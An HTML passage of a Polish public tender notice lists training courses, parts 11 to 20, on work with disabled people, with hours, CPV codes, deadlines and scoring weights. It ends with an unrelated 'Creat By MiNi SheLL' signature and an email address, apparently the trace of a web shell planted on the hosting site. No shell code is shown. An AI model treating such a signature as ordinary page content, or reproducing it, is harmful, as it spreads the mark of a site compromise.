<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 30</li>
<li>3. Certyfikat w zakresie jakości usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Kurs Sposoby i metody pracy z osobami niepełnosprawnymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Sposoby i metody pracy z osobami niepełnosprawnymi   (32 godz. zajęć) - dla 18 osób (dwie grupy po 9 osób).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 30</li>
<li>3. Certyfikat w zakresie jakości usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Seksualność osób niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Seksualność osób niepełnosprawnych (16 godz. zajęć) - dla 18 osób (dwie grupy po 9 osób).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 30</li>
<li>3. Certyfikat w zakresie jakości usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Diagnoza osób  niepełnosprawnych  w oparciu o Profil Psychoedukacyjny  PEPR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Diagnoza osób  niepełnosprawnych  w oparciu o Profil Psychoedukacyjny  PEPR (32 godzin zajęć) - dla 18 osób (dwie grupy po 9 osób).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 30</li>
<li>3. Certyfikat w zakresie jakości usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Aktywizacja zawodowa osób niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aktywizacja zawodowa osób niepełnosprawnych (8 godz. zajęć) - dla 18 osób (dwie grupy po 9 osób).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 30</li>
<li>3. Certyfikat w zakresie jakości usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Opiekunka dziecięca i osoby starszej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opiekunka dziecięca i osoby starszej (24 godz. zajęć) - dla 18 osób (dwie grupy po 9 osób).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 30</li>
<li>3. Certyfikat w zakresie jakości usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zachowania agresywne i autoagresywne osób niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zachowania agresywne i autoagresywne osób niepełnosprawnych (16 godz. zajęć) - dla 18 osób (dwie grupy po 9 osób).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 30</li>
<li>3. Certyfikat w zakresie jakości usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Sytuacja społeczna osób niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sytuacja społeczna osób niepełnosprawnych (16 godz. zajęć) - dla 18 osób (dwie grupy po 9 osób).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 30</li>
<li>3. Certyfikat w zakresie jakości usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Metoda Bobath.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Metoda Bobath dla 1 osoby - Minimalna liczba godzin całego szkolenia powinna wynosić 110h.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 30</li>
<li>3. Certyfikat w zakresie jakości usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Metoda Nordic Walking.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Metoda Nordic Walking dla 2 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 30</li>
<li>3. Certyfikat w zakresie jakości usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Metoda laseroterapia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Metoda laseroterapia  dla 3 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 30</li>
<li>3. Certyfikat w zakresie jakości usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com